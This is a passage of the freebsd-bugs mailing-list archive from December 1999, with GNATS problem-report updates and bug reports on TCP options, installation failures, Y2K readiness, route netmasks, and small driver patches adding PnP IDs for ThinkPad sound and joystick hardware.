freebsd-bugs@FreeBSD.org Subject: Re: kern/1689: TCP extensions throttles distant connections Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: TCP extensions throttles distant connections State-Changed-From-To: closed->open State-Changed-By: sheldonh State-Changed-When: Wed Dec 22 08:51:39 PST 1999 State-Changed-Why: wollman insisted on it, after explaining that this is a real bug. Responsible-Changed-From-To: wollman->freebsd-bugs Responsible-Changed-By: sheldonh Responsible-Changed-When: Wed Dec 22 08:51:39 PST 1999 Responsible-Changed-Why: wollman isn't looking at it. :-) I'm going to ask luigi, fenner and des to take a look. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 9: 0: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 41EF7154FD for ; Wed, 22 Dec 1999 09:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA15478; Wed, 22 Dec 1999 09:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 22 Dec 1999 09:00:02 -0800 (PST) Message-Id: <199912221700.JAA15478@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: kern/1689: TCP extensions throttles distant connections Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/1689; it has been noted by GNATS. From: Sheldon Hearn To: Garrett Wollman Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: kern/1689: TCP extensions throttles distant connections Date: Wed, 22 Dec 1999 18:57:44 +0200 On Wed, 22 Dec 1999 11:44:18 EST, Garrett Wollman wrote: > Yes. There should be some form of ``black hole detection'' which, > after some number of SYNs, turns off TCP options and tries again. > (I believe 1323 is still on by default in the kernel, but the default > rc.conf turns it off again. 1323 is vital for TCP performance over > fast wide-area networks.) Okay, I've reopened the PR. Thanks, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 9:19:16 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0EA9E1549B; Wed, 22 Dec 1999 09:19:15 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA17223; Wed, 22 Dec 1999 09:19:14 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Wed, 22 Dec 1999 09:19:14 -0800 (PST) From: Message-Id: <199912221719.JAA17223@freefall.freebsd.org> To: james@jraynard.demon.co.uk, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, eivind@FreeBSD.org Subject: Re: bin/1375: Extraneous warning from mv(1) [PATCH] Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Extraneous warning from mv(1) [PATCH] State-Changed-From-To: suspended->open State-Changed-By: sheldonh State-Changed-When: Wed Dec 22 09:18:21 PST 1999 State-Changed-Why: I have a victim. :-) Responsible-Changed-From-To: freebsd-bugs->eivind Responsible-Changed-By: sheldonh Responsible-Changed-When: Wed Dec 22 09:18:21 PST 1999 Responsible-Changed-Why: He volunteered. Well, sorta. ;-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 9:57:24 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id 4105B14BDB; Wed, 22 Dec 1999 09:57:20 -0800 (PST) (envelope-from bde@zeta.org.au) Received: from bde.zeta.org.au (beefcake.zeta.org.au [203.26.10.12]) by mailman.zeta.org.au (8.8.7/8.8.7) with ESMTP id EAA03106; Thu, 23 Dec 1999 04:57:17 +1100 Date: Thu, 23 Dec 1999 04:56:58 +1100 (EST) From: Bruce Evans X-Sender: bde@alphplex.bde.org To: sheldonh@FreeBSD.ORG Cc: james@jraynard.demon.co.uk, freebsd-bugs@FreeBSD.ORG, eivind@FreeBSD.ORG Subject: Re: bin/1375: Extraneous warning from mv(1) [PATCH] In-Reply-To: <199912221719.JAA17223@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 22 Dec 1999 sheldonh@FreeBSD.ORG wrote: > Synopsis: Extraneous warning from mv(1) [PATCH] > > State-Changed-From-To: suspended->open > State-Changed-By: sheldonh > State-Changed-When: Wed Dec 22 09:18:21 PST 1999 > State-Changed-Why: > I have a victim. :-) I ran with Garrett's patch for some time, until it was clear that we don't want it, because POSIX requires BSD semantics for gids of new files. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 10:11: 0 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from complx.LF.net (complx.LF.net [212.118.160.200]) by hub.freebsd.org (Postfix) with ESMTP id 3384014DCB; Wed, 22 Dec 1999 10:10:57 -0800 (PST) (envelope-from pi@complx.LF.net) Received: by complx.LF.net (Smail3.2.0.106/complx.LF.net) via LF.net GmbH Internet Services from pi for phantom@FreeBSD.org for host hub.FreeBSD.org id m120qDv-000zyRC; Wed, 22 Dec 1999 19:10:55 +0100 (CET) Message-Id: Subject: Re: misc/13152: systemwide username too short (currently 16 char, should be 64 or so) To: phantom@FreeBSD.org Date: Wed, 22 Dec 1999 19:10:55 +0100 (CET) From: "Kurt Jaeger" Cc: pi@LF.net, freebsd-bugs@FreeBSD.org In-Reply-To: <199912201708.JAA34641@freefall.freebsd.org> from "phantom@FreeBSD.org" at Dec 20, 1999 09:08:45 AM X-NCC-RegID: de.oberon MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! > Synopsis: systemwide username too short (currently 16 char, should be 64 or so) > State-Changed-From-To: open->closed > State-Changed-By: phantom > State-Changed-When: Mon Dec 20 09:04:53 PST 1999 > State-Changed-Why: > You did not provide any real example. My experience shown that 16 chars is *really* > enough. Anyway aliases(5) is your friend. My goal is it to set up a system that allows user-allocated (!) usernames for many different domains on one physical system. For this to work, I set up a scheme that allows something like user+domain as username. With the 16 chars limit, this failes very soon for domains longer than a few characters. This was the reason I asked for 64 chars. Aliases are nice for single/few-domain setups, not for systems with >>1000 domains on one system. Reason: collissions when selecting the "local" part of an account. I still think this should be part of Fbsd. -- MfG/Best regards, Kurt Jaeger 21 years to go ! LF.net GmbH pi@LF.net Oberon.net GmbH pi@oberon.net Vor dem Lauch 23 fon +49 711 90074-23 Friedrich-Ebert-Str.1 D-70567 Stuttgart fax +49 711 7289041 40210 Duesseldorf fon +49 211 179253-11 For Redmond: "nuke the site from orbit -- it's the only way to be sure." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 10:40: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E7AF014D6E for ; Wed, 22 Dec 1999 10:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA24323; Wed, 22 Dec 1999 10:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 28D8D14D6E; Wed, 22 Dec 1999 10:39:42 -0800 (PST) Message-Id: <19991222183942.28D8D14D6E@hub.freebsd.org> Date: Wed, 22 Dec 1999 10:39:42 -0800 (PST) From: rec@RCousins.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: i386/15631: 3.4 won't install with IBM 37.5 gb disks Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15631 >Category: i386 >Synopsis: 3.4 won't install with IBM 37.5 gb disks >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 22 10:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Robert Cousins >Release: 3.4 >Organization: Cousins Consulting >Environment: N/A >Description: I've tried installing FreeBSD 3.4 on *KNOWN GOOD HARDWARE* using a *NEW* IBM 37.5 gb IDE disk. The installation dies as soon as it build the filesystems and begins to copy files onto the disk. I rebuilt the generic kernel on the install floppy (setting flags to 0xb0ffb0ff) and the install completed, but on reboot the filesystems were too corrupt -- fsck gave up. >How-To-Repeat: Take any machine with an IBM 37.5 gb IDE disk as the primary system disk and perform the install from floppy. I will lend the disk to a developer or contribute money to buy one. I just want the bug(s) fixed. >Fix: N/A Linux doesn't support IDE disks > 32 gb either. I don't know if there is a BIOS interaction here, or not on top of everything else. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 10:59: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mail.wachusett-rhs.wrsd.k12.ma.us (mail.wachusett-rhs.wrsd.k12.ma.us [199.232.160.42]) by hub.freebsd.org (Postfix) with SMTP id EA198155A1 for ; Wed, 22 Dec 1999 10:59:05 -0800 (PST) (envelope-from Joe_Firmani@wrsd.net) Message-id: X-UID: 0034a5f2 Date: Wed, 22 Dec 1999 13:59:02 -0500 Subject: FreeBSD 2.1.5 To: freebsd-bugs@FreeBSD.org From: Joe_Firmani@wrsd.net (Joe Firmani) MIME-Version: 1.0 Content-type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am the new Information Systems Supervisor for the Wachusett Regional School District in Princeton, Massachusetts. I have recently found that we have a DNS server that is running FreeBSD version 2.1.5. I've been on your website, but cannot find anything related to the Y2K preparedness of this version of the software and if it is not, how to make it Y2K compliant. Unfortunately, there is no one in the School District that knows this software, making it unusually difficult. I await your response. ___________________________ Joseph Firmani Information Systems Supervisor Wachusett Regional School District Phone: (978)464-2130 x275 Email: Joe_Firmani@wrsd.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 11:10: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1D07114D7F for ; Wed, 22 Dec 1999 11:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA27748; Wed, 22 Dec 1999 11:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 22 Dec 1999 11:10:02 -0800 (PST) Message-Id: <199912221910.LAA27748@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Adrian Chadd Subject: Re: bin/2258: route add/delete Reply-To: Adrian Chadd Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/2258; it has been noted by GNATS. From: Adrian Chadd To: Sheldon Hearn Cc: jin@george.lbl.gov, adrian@freebsd.org, freebsd-gnats-submit@freebsd.org Subject: Re: bin/2258: route add/delete Date: Wed, 22 Dec 1999 20:05:41 +0100 On Tue, Dec 21, 1999, Sheldon Hearn wrote: > > Greetings, > > On Sun, 19 Sep 1999 15:12:14 -0700 (PDT), jin@george.lbl.gov wrote: > > > If this field has been changed to netmask in 2.2.x or later, then this > > is the problem. I will look into the code later next week to see if > > this is true. > > Did you find time to look into this? Yup, its actually a netmask field being parsed by route, and the route code in the kernel messes up non-contiguous netmasks. I suggested that we stick a bogon filter in there for this, but garret poked me back saying that non-contiguous netmasks were meant to work.. I haven't looked at it much after that, and I'm on holidays. when I'm back, and its assigned to me, I'll poke at it more. Adrian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 11:16:51 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 12D791559E; Wed, 22 Dec 1999 11:16:50 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA28847; Wed, 22 Dec 1999 11:16:49 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Wed, 22 Dec 1999 11:16:49 -0800 (PST) From: Message-Id: <199912221916.LAA28847@freefall.freebsd.org> To: dada@sbox.tu-graz.ac.at, phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: conf/9246: allscreens_flags in /etc/rc.conf not working properly Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: allscreens_flags in /etc/rc.conf not working properly State-Changed-From-To: open->closed State-Changed-By: phantom State-Changed-When: Wed Dec 22 11:16:05 PST 1999 State-Changed-Why: Duplication of misc/15066. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 11:43: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from smtp1.vnet.net (smtp1.vnet.net [166.82.1.31]) by hub.freebsd.org (Postfix) with ESMTP id 02A0B14D7F for ; Wed, 22 Dec 1999 11:43:00 -0800 (PST) (envelope-from rivers@dignus.com) Received: from dignus.com (ponds.vnet.net [166.82.177.48]) by smtp1.vnet.net (8.9.1a/8.9.1) with ESMTP id OAA08258; Wed, 22 Dec 1999 14:42:56 -0500 (EST) Received: from lakes.dignus.com (lakes.dignus.com [10.0.0.3]) by dignus.com (8.9.2/8.8.5) with ESMTP id OAA32502; Wed, 22 Dec 1999 14:42:52 -0500 (EST) Received: (from rivers@localhost) by lakes.dignus.com (8.9.3/8.6.9) id OAA45825; Wed, 22 Dec 1999 14:42:52 -0500 (EST) Date: Wed, 22 Dec 1999 14:42:52 -0500 (EST) From: Thomas David Rivers Message-Id: <199912221942.OAA45825@lakes.dignus.com> To: freebsd-bugs@FreeBSD.ORG, Joe_Firmani@wrsd.net Subject: Re: FreeBSD 2.1.5 In-Reply-To: Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Joe - You may want to simply upgrade to the latest stable version (version 3.4), your 2.1.5 version is rather dated. You can find information on downloading and installing the latest version on the web pages. As I understand it, all known Y2K issues are addressed in this version. As far as learning about FreeBSD; you may want to purchase one of the better books about it. I believe you can find this in area bookstores, and on-line at the FreeBSD Mall (http://www.freebsdmall.com/) - Dave Rivers - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 11:59:23 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E081C151B8; Wed, 22 Dec 1999 11:59:19 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA33453; Wed, 22 Dec 1999 11:59:18 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Wed, 22 Dec 1999 11:59:18 -0800 (PST) From: Message-Id: <199912221959.LAA33453@freefall.freebsd.org> To: cjc@cc942873-a.ewndsr1.nj.home.com, cpiazza@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/15629: installworld fails due to absent dir: /usr/share/examples/diskless Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: installworld fails due to absent dir: /usr/share/examples/diskless State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Wed Dec 22 11:58:07 PST 1999 State-Changed-Why: Fixed in rev 1.148 of etc/mtree/BSD.user.dist by phantom To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 12: 0: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7F12D15574 for ; Wed, 22 Dec 1999 12:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA33633; Wed, 22 Dec 1999 12:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from caspian.plutotech.com (caspian.plutotech.com [206.168.67.80]) by hub.freebsd.org (Postfix) with ESMTP id A941E15066 for ; Wed, 22 Dec 1999 11:50:12 -0800 (PST) (envelope-from gibbs@caspian.plutotech.com) Received: (from gibbs@localhost) by caspian.plutotech.com (8.9.3/8.9.1) id MAA00517; Wed, 22 Dec 1999 12:50:20 -0700 (MST) (envelope-from gibbs) Message-Id: <199912221950.MAA00517@caspian.plutotech.com> Date: Wed, 22 Dec 1999 12:50:20 -0700 (MST) From: "Justin T. Gibbs" Reply-To: gibbs@FreeBSD.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/15632: mss driver fails to recognize CS4239 on Thinkpad 770X Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15632 >Category: kern >Synopsis: mss driver fails to recognize CS4239 on Thinkpad 770X >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 22 12:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Justin T. Gibbs >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: Thinkpad 770X with CS4610 PCI accellarator CS4239 sound configuraiton. I believe the TP660 has the same setup. >Description: Until we can get the PCI CS driver to handle non AC-97 codecs, we should attach directly to the CS4239 and run in ISA compatibiliy mode. Unfortunately, all of the CS resources on the board have a slightly different logical ID than the normal ones. They use CSC01XX instead of CS00XX. Perhaps this is to indicate that there is a PCI accelerator attached? >How-To-Repeat: Add the pcm driver to your kernel config and boot that kernel. >Fix: ==== //depot/FreeBSD-current/src/sys/dev/sound/isa/mss.c#6 - /usr/src/sys/dev/sound/isa/mss.c ==== *** /tmp/tmp.315.32 Wed Dec 22 12:43:21 1999 --- /usr/src/sys/dev/sound/isa/mss.c Wed Dec 22 12:37:45 1999 *************** *** 1325,1330 **** --- 1329,1335 ---- } static struct isa_pnp_id pnpmss_ids[] = { + {0x0001630e, "CS423x"}, /* CSC0000 */ {0x0000630e, "CS423x"}, /* CSC0000 */ {0x01000000, "CMI8330"}, /* @@@0001 */ {0x2100a865, "Yamaha OPL-SAx"}, /* YMH0021 */ *************** *** 1360,1365 **** --- 1365,1371 ---- mss->drq2_rid = 1; switch (isa_get_logicalid(dev)) { + case 0x0001630e: /* CSC0000 */ case 0x0000630e: /* CSC0000 */ mss->bd_flags |= BD_F_MSS_OFFSET; mss->bd_id = MD_CS42XX; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 12: 0:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 82BF61556F for ; Wed, 22 Dec 1999 12:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA33643; Wed, 22 Dec 1999 12:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from caspian.plutotech.com (caspian.plutotech.com [206.168.67.80]) by hub.freebsd.org (Postfix) with ESMTP id A733F154DB for ; Wed, 22 Dec 1999 11:54:46 -0800 (PST) (envelope-from gibbs@caspian.plutotech.com) Received: (from gibbs@localhost) by caspian.plutotech.com (8.9.3/8.9.1) id MAA00631; Wed, 22 Dec 1999 12:54:55 -0700 (MST) (envelope-from gibbs) Message-Id: <199912221954.MAA00631@caspian.plutotech.com> Date: Wed, 22 Dec 1999 12:54:55 -0700 (MST) From: "Justin T. Gibbs" Reply-To: gibbs@FreeBSD.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/15633: Joy driver fails to attach to CS joystick port on TP770X Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15633 >Category: kern >Synopsis: Joy driver fails to attach to CS joystick port on TP770X >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 22 12:00:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Justin T. Gibbs >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: Thinkpad 770X with CS4610/CS4239 combo. This probably applies to the TP660 as well. >Description: The TP uses CSC01XX instead of CSC00XX for all of its CSC PnP Ids. One piece of CS documentation seemed to indicate that this byte was ignored by their software as they expected the vendor to change it for their own MB. Perhaps we need to add a mask field into the PnP info tables so we can generically deal with this. >How-To-Repeat: Attempt to configure the joy driver on a Thinkpad 770X. >Fix: ==== //depot/FreeBSD-current/src/sys/isa/joy.c#3 - /usr/src/sys/isa/joy.c ==== *** /tmp/tmp.315.34 Wed Dec 22 12:43:22 1999 --- /usr/src/sys/isa/joy.c Wed Dec 22 12:36:47 1999 *************** *** 99,104 **** --- 99,105 ---- devclass_t joy_devclass; static struct isa_pnp_id joy_ids[] = { + {0x0101630e, "CSC0001 PnP Joystick"}, /* CSC0001 */ {0x0100630e, "CSC0001 PnP Joystick"}, /* CSC0001 */ {0x01100002, "ALS0110 PnP Joystick"}, /* @P@1001 */ {0x01100002, "ALS0120 PnP Joystick"}, /* @P@2001 */ >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 12: 1:45 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from norn.ca.eu.org (cr965240-b.abtsfd1.bc.wave.home.com [24.113.19.137]) by hub.freebsd.org (Postfix) with ESMTP id DAA8214EFB; Wed, 22 Dec 1999 12:01:43 -0800 (PST) (envelope-from cpiazza@norn.ca.eu.org) Received: by norn.ca.eu.org (Postfix, from userid 1000) id 74CBE1CB; Wed, 22 Dec 1999 12:01:43 -0800 (PST) Date: Wed, 22 Dec 1999 12:01:43 -0800 From: Chris Piazza To: cpiazza@FreeBSD.ORG Cc: cjc@cc942873-a.ewndsr1.nj.home.com, freebsd-bugs@FreeBSD.ORG Subject: Re: misc/15629: installworld fails due to absent dir: /usr/share/examples/diskless Message-ID: <19991222120143.C318@norn.ca.eu.org> References: <199912221959.LAA33453@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <199912221959.LAA33453@freefall.freebsd.org>; from cpiazza@FreeBSD.ORG on Wed, Dec 22, 1999 at 11:59:18AM -0800 X-Operating-System: FreeBSD 4.0-CURRENT i386 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Dec 22, 1999 at 11:59:18AM -0800, cpiazza@FreeBSD.ORG wrote: > Synopsis: installworld fails due to absent dir: /usr/share/examples/diskless > > State-Changed-From-To: open->closed > State-Changed-By: cpiazza > State-Changed-When: Wed Dec 22 11:58:07 PST 1999 > State-Changed-Why: > Fixed in rev 1.148 of etc/mtree/BSD.user.dist by phantom I meant rev 1.146.2.11, of course. I fixed it in the gnats database already. -Chris -- cpiazza@jaxon.net cpiazza@FreeBSD.org Abbotsford, BC, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 12:58:49 1999 Delivered-To: freebsd-bugs@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 542) id 653E614DDF; Wed, 22 Dec 1999 12:58:46 -0800 (PST) To: cejkar@dcse.fee.vutbr.cz, ache@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG From: ache@FreeBSD.ORG Subject: Re: bin/15458 Message-Id: <19991222205846.653E614DDF@hub.freebsd.org> Date: Wed, 22 Dec 1999 12:58:46 -0800 (PST) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: sort(1) doesn't sort correctly in some cases State-Changed-From-To: open->analyzed State-Changed-By: ache State-Changed-When: Wed Dec 22 12:57:30 PST 1999 State-Changed-Why: I agree that we need to switch to sort-2.0 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 13: 0: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 42161155BA for ; Wed, 22 Dec 1999 13:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA40104; Wed, 22 Dec 1999 13:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 3584115586; Wed, 22 Dec 1999 12:56:50 -0800 (PST) Message-Id: <19991222205650.3584115586@hub.freebsd.org> Date: Wed, 22 Dec 1999 12:56:50 -0800 (PST) From: cheiser@cais.net To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: i386/15635: FreeBSD 3.4 Installation caught signal 11 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15635 >Category: i386 >Synopsis: FreeBSD 3.4 Installation caught signal 11 >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 22 13:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Chris Heiser >Release: FreeBSD-3.4-RELEASE >Organization: CAIS Internet >Environment: I'd give it to you if it would install. >Description: After install floppies boot. I go partition a 334MB disk with 1 partition. I label it with 330MB for / and 4MB swap. (It's a flash drive) I then goto select the distributions I want to install. I goto custom and right when I hit it it catches signal 11. No additional output is produced by turning debugging on. The installation method choosen is FTP >How-To-Repeat: Just do the above and it'll happen every time!!! >Fix: I have no idea >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 15: 3:35 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from cs.rice.edu (cs.rice.edu [128.42.1.30]) by hub.freebsd.org (Postfix) with ESMTP id 13FF8154B5 for ; Wed, 22 Dec 1999 15:03:32 -0800 (PST) (envelope-from aron@cs.rice.edu) Received: (from aron@localhost) by cs.rice.edu (8.9.0/8.9.0) id RAA19822 for freebsd-bugs@freebsd.org; Wed, 22 Dec 1999 17:03:31 -0600 (CST) Date: Wed, 22 Dec 1999 17:03:31 -0600 (CST) From: Mohit Aron Message-Id: <199912222303.RAA19822@cs.rice.edu> To: freebsd-bugs@freebsd.org Subject: release nodes for FreeBSD-3.4 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I was going through the release notes for FreeBSD-3.4 and noticed that they do not mention that FreeBSD-3.4 supports the new Intel InBusiness 10/100 Ethernet cards. Can the release notes be updated to reflect that. Thanks, - Mohit To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 15:40:14 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 51B4E15723 for ; Wed, 22 Dec 1999 15:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA54590; Wed, 22 Dec 1999 15:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 22 Dec 1999 15:40:02 -0800 (PST) Message-Id: <199912222340.PAA54590@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Jonathan Lemon Subject: Re: kern/1689: TCP extensions throttles distant connections Reply-To: Jonathan Lemon Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR 